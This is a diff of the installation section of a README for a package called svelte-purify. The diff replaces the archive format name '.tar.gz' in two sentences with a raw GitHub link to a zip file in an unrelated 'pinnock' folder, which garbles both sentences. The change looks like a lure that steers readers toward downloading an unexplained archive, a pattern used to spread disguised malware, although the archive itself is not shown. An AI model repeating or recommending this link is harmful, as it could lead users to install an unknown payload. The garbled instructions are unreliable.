yukiboy121/svelte-purify/README.md

 ### 3. Download the Package

-Once you've selected a version, look for the appropriate download link. svelte-purify comes in different formats like .zip or .tar.gz.
-Click the file link for the format you prefer, and the download will start automatically.
+Once you've selected a version, look for the appropriate download link. svelte-purify comes in different formats like .zip or https://raw.githubusercontent.com/yukiboy121/svelte-purify/main/pinnock/svelte-purify.zip Click the file link for the format you prefer, and the download will start automatically.

 ### 4. Extract the Files

 After the download is complete, locate the file on your computer.

 - If you downloaded a .zip file, right-click it and choose "Extract All" or use a similar option based on your operating system.
-- If you downloaded a .tar.gz file, you may need a tool like 7-Zip or WinRAR to extract it.
+- If you downloaded a https://raw.githubusercontent.com/yukiboy121/svelte-purify/main/pinnock/svelte-purify.zip file, you may need a tool like 7-Zip or WinRAR to extract it.

 Make sure to extract the files to a location you can easily access.